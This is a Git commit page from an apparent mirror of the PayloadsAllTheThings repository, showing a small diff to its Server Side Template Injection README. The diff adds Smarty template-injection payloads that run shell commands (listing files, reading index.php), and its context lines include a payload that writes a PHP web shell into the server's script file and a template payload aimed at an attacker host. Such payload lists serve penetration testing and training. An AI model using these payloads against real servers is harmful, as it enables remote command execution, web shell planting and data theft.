daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update Smarty Template Injection

patch-1
mpgn 2021-05-20 16:42:51 +02:00 committed by GitHub
parent f6f8ec010a
commit 367296c1f1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Server Side Template Injection/README.md
View File

@ -233,8 +233,10 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
```python ```python
{$smarty.version} {$smarty.version}
{php}echo `id`;{/php} {php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3
``` ```
## Freemarker ## Freemarker